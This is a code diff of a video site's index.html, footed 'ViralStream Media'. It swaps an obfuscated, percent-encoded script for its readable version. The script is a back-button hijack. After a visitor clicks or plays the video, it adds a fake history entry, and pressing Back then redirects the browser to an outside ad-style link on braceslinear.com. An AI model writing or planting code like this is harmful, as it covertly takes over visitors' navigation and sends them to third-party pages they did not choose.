--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <html lang="en">
 <head>
   <meta charset="utf-8" />
-  <title> XXXXXXX </title>
+  <title> XXXXXX  </title>
   <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" />
 
   <style>
@@ -113,9 +113,30 @@
     © 2026 ViralStream Media. All rights reserved.
   </footer>
 
-<script>
-<!-- code by https://www.html-code-generator.com -->
-document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%63%6F%6E%73%74%20%64%69%72%65%63%74%4C%69%6E%6B%20%3D%20%22%68%74%74%70%73%3A%2F%2F%62%72%61%63%65%73%6C%69%6E%65%61%72%2E%63%6F%6D%2F%64%34%30%77%38%6D%78%35%63%3F%6B%65%79%3D%65%31%35%32%34%30%33%37%31%35%30%38%66%32%31%38%33%38%38%34%38%63%32%39%61%36%31%38%36%33%30%61%22%3B%0A%20%20%63%6F%6E%73%74%20%76%69%64%65%6F%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%71%75%65%72%79%53%65%6C%65%63%74%6F%72%28%22%76%69%64%65%6F%22%29%3B%0A%0A%20%20%69%66%20%28%21%76%69%64%65%6F%29%20%72%65%74%75%72%6E%3B%0A%0A%20%20%6C%65%74%20%61%72%6D%65%64%20%3D%20%66%61%6C%73%65%3B%0A%0A%20%20%66%75%6E%63%74%69%6F%6E%20%61%72%6D%42%61%63%6B%52%65%64%69%72%65%63%74%28%29%20%7B%0A%20%20%20%20%69%66%20%28%61%72%6D%65%64%29%20%72%65%74%75%72%6E%3B%0A%20%20%20%20%61%72%6D%65%64%20%3D%20%74%72%75%65%3B%0A%0A%20%20%20%20%68%69%73%74%6F%72%79%2E%70%75%73%68%53%74%61%74%65%28%6E%75%6C%6C%2C%20%6E%75%6C%6C%2C%20%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%29%3B%0A%0A%20%20%20%20%77%69%6E%64%6F%77%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%22%70%6F%70%73%74%61%74%65%22%2C%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%20%3D%20%64%69%72%65%63%74%4C%69%6E%6B%3B%0A%20%20%20%20%7D%29%3B%0A%20%20%7D%0A%0A%20%20%2F%2F%20%61%6B%74%69%66%6B%61%6E%20%73%65%74%65%6C%61%68%20%69%6E%74%65%72%61%6B%73%69%20%75%73%65%72%0A%20%20%76%69%64%65%6F%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%22%63%6C%69%63%6B%22%2C%20%61%72%6D%42%61%63%6B%52%65%64%69%72%65%63%74%29%3B%0A%20%20%76%69%64%65%6F%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%22%70%6C%61%79%22%2C%20%61%72%6D%42%61%63%6B%52%65%64%69%72%65%63%74%29%3B%0A%7D%29%28%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));
+<script type="text/javascript">
+(function () {
+  const directLink = "https://braceslinear.com/d40w8mx5c?key=e15240371508f21838848c29a618630a";
+  const video = document.querySelector("video");
+
+  if (!video) return;
+
+  let armed = false;
+
+  function armBackRedirect() {
+    if (armed) return;
+    armed = true;
+
+    history.pushState(null, null, location.href);
+
+    window.addEventListener("popstate", function () {
+      window.location.href = directLink;
+    });
+  }
+
+  // aktifkan setelah interaksi user
+  video.addEventListener("click", armBackRedirect);
+  video.addEventListener("play", armBackRedirect);
+})();
 </script>
 
 	<!-- Histats.com  START  (aync)-->
